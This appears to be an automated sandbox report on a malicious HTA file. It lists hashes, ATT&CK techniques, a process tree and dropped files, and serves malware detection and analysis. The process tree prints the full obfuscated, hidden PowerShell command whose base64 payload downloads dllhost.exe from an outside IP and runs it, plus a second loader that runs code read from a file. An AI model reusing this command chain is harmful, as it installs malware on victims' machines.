f99757c98007da241258ae12ec0fd5083f0475a993ca6309811263aad17d4661

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01/10/2024, 01:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f99757c98007da241258ae12ec0fd5083f0475a993ca6309811263aad17d4661.hta
Size

115KB
MD5

c443d03e485232a860b726fc83593004
SHA1

6b556d04962638694402d15b7fa24b6bd6b1d1f4
SHA256

f99757c98007da241258ae12ec0fd5083f0475a993ca6309811263aad17d4661
SHA512

3a7201a36b2875c59db6e41369f52c941cd5d0d51bf90fca31abf05f71c76a7d5a6305667649ae8d2f63a3951a44643402853c096b07143531eaa6f6c5bb7c34
SSDEEP

96:Ea+M73rNp6fEVNp60WU1Qgr8l+Qu3i9pNp6R6Np6Er5BfqVNp61AT:Ea+Q35puEnp08QgocyNpJpxCnpxT

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2040	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
844	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2040	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2616	dllhost.exe

Loads dropped DLL 1 IoCs

pid	Process
2040	powershell.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\omdigtendes.udd	dllhost.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\brandbombernes.lnk	dllhost.exe
File opened for modification	C:\Windows\Fonts\knytt\Ballistics.mus	dllhost.exe
File opened for modification	C:\Windows\resources\villan\Knastakslerne.ini	dllhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
844	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	844	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2480 wrote to memory of 2356	2480	mshta.exe	31
PID 2480 wrote to memory of 2356	2480	mshta.exe	31
PID 2480 wrote to memory of 2356	2480	mshta.exe	31
PID 2480 wrote to memory of 2356	2480	mshta.exe	31
PID 2356 wrote to memory of 2040	2356	cmd.exe	33
PID 2356 wrote to memory of 2040	2356	cmd.exe	33
PID 2356 wrote to memory of 2040	2356	cmd.exe	33
PID 2356 wrote to memory of 2040	2356	cmd.exe	33
PID 2040 wrote to memory of 1820	2040	powershell.exe	34
PID 2040 wrote to memory of 1820	2040	powershell.exe	34
PID 2040 wrote to memory of 1820	2040	powershell.exe	34
PID 2040 wrote to memory of 1820	2040	powershell.exe	34
PID 1820 wrote to memory of 2780	1820	csc.exe	35
PID 1820 wrote to memory of 2780	1820	csc.exe	35
PID 1820 wrote to memory of 2780	1820	csc.exe	35
PID 1820 wrote to memory of 2780	1820	csc.exe	35
PID 2040 wrote to memory of 2616	2040	powershell.exe	37
PID 2040 wrote to memory of 2616	2040	powershell.exe	37
PID 2040 wrote to memory of 2616	2040	powershell.exe	37
PID 2040 wrote to memory of 2616	2040	powershell.exe	37
PID 2616 wrote to memory of 844	2616	dllhost.exe	38
PID 2616 wrote to memory of 844	2616	dllhost.exe	38
PID 2616 wrote to memory of 844	2616	dllhost.exe	38
PID 2616 wrote to memory of 844	2616	dllhost.exe	38

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\f99757c98007da241258ae12ec0fd5083f0475a993ca6309811263aad17d4661.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2480
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2040
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n349d5ym.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1820
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD634.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD633.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2780
  - - C:\Users\Admin\AppData\Roaming\dllhost.exe
      "C:\Users\Admin\AppData\Roaming\dllhost.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2616
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\Admin\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESD634.tmp

Filesize
1KB

MD5
63f6db0d63d5587fc8a90c714914aa59

SHA1
c1cecee07ba5ffdb74acba18ba58800f47023f2f

SHA256
6ac12d53dc69161302765b5e2c9d33830a05f1d0a635493f3ee55c505d2cf5ec

SHA512
3b7717f4c02ab188184a3c8d36b90a9aa8f1ed3496dd10c75e36668f97d7353a084c3e281701ae278a1e3134acbfa3e347b91426d08d7a513c9ed9afcef2649b

Download Submit
C:\Users\Admin\AppData\Local\Temp\n349d5ym.dll

Filesize
3KB

MD5
7ef0722560ba25634048246cce0571f7

SHA1
32b4840469c2e49242b8606195e7db1583f6881f

SHA256
50b7d8fb9d05a60c96ab4ed99468f9b4faa91eb08afb63218a6b968931346124

SHA512
2c25f3c5849f1f738f0ac8cb5875ab6036d62606458d6e0395d97404fa40fff28e305712739934350803c2bcb223a4c0c06247456613780f5a4ded267c729a12

Download Submit
C:\Users\Admin\AppData\Local\Temp\n349d5ym.pdb

Filesize
7KB

MD5
fa16a7b39044817dc8a389d3c4014831

SHA1
1c521888fd61d78c1b869e7fda588ca709a44914

SHA256
86e2f463feb939f5ef0d63d72a61f0b04d0eb5ba18ecfbe7c101fa0ab78c7a3a

SHA512
9513d75ab8eeaa182988507457d064e5b1d7b2d4f370247aa772fef5d138cba2186d915f3a40c4c748d512246dd0294f81ebadfb1a74c89b9f039fdaff6083a2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JOOQU8GBG3C7BD0NTH9M.temp

Filesize
7KB

MD5
fcc592127bb0d04c56b0cbf2fc0fa46c

SHA1
a2caa900aff692f913cc16eda10044fd91df905b

SHA256
44c549a3605c9076d9f194e99ba498be2fa2a7915a318db9a612678ca4d82c7d

SHA512
29fba240c5c4477d70a713da20f4f395347c4d2d4d0354f5a0ca96fe83d0f00803dba405b78edd7f257f837122ba239065a61e086088f1b7f1f9b80ffd76cc3c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
ec8a4bd6e0be25b94731fcac0cb9d4f3

SHA1
79e44ba1e7a1fc3eec969d8d62e8a970ce1085fe

SHA256
3f9f8b0afbcb604eef3272fd0f41da90b84f21aaa4bbea12808cc15a363c923a

SHA512
47d2433a635e5949c7de522cf87fa518ac2e01d45a9f53af77146988d2ffc2832524ccb4ef660d07b1b605c3e22d4ed59ed710ee504ff54c87fbee7869ed485a

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
967KB

MD5
450228d72f9f726b645c55bbbc6db905

SHA1
b26075c51a4681f2ff7407188f5e9480545a7aca

SHA256
9124d7696d2b94e7959933c3f7a8f68e61a5ce29cd5934a4d0379c2193b126be

SHA512
4795d090447d237cbe1a044ffe78e8cd0c9be358df778673b4713eab2c324056a7701d22b827b95b2413845089fa71ac81a4f47cc8bcdbabad34845e64b4e090

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCD633.tmp

Filesize
652B

MD5
9414f2fe286f3d31fa250df1e1267757

SHA1
7ee59d37702dec5beacd2624a9fe0117bd615d51

SHA256
30b2907e60de0dd707f5c9c12b81e0d97413fa0135ef8006cc7e93885af59b3d

SHA512
86c2e7ae5b5ebe9d37ec4e37f8d2fecd6255df355aeeac4ea8d6c4f2043aaafb96955245c2c77b624f8ca19429b1d008909b395b6ecb5840fe4ce29cd09fc3a2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n349d5ym.0.cs

Filesize
474B

MD5
ed8b0b366b8fd7bdf35fcddb6a6fc768

SHA1
f333be6ecec2ac5315dc3cb28ffe6202e6c3e142

SHA256
f179dbf6f56665e7020a3cf42a5150aed8a15253ccbcf368cdc526c88d90d99b

SHA512
1ace461d8af56f8002e38eb8274f86c026abfbfbd851c93d878d9a211ee727005b98c7236f43e1497c0a654ba45dc87ab6ed3ec49c77b3a3013e771381f523ce

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n349d5ym.cmdline

Filesize
309B

MD5
dfeb8e81ff4cb52508cadc2d6238d6ea

SHA1
162b37b16bd1b61ad2fe2ad94a8b8d1882803f30

SHA256
e5b0f9c4e6988ab11108c80eb5acd72ceb8cc6237967df4b3f4200a949667b25

SHA512
98b751013e955f841b87019dfaa29019c57cb0a1c9850d22fb246ca66eced62b0c330e7937c94a2694a530e05d501ff908221747c37fdf19355ad769a6529a25

Download Submit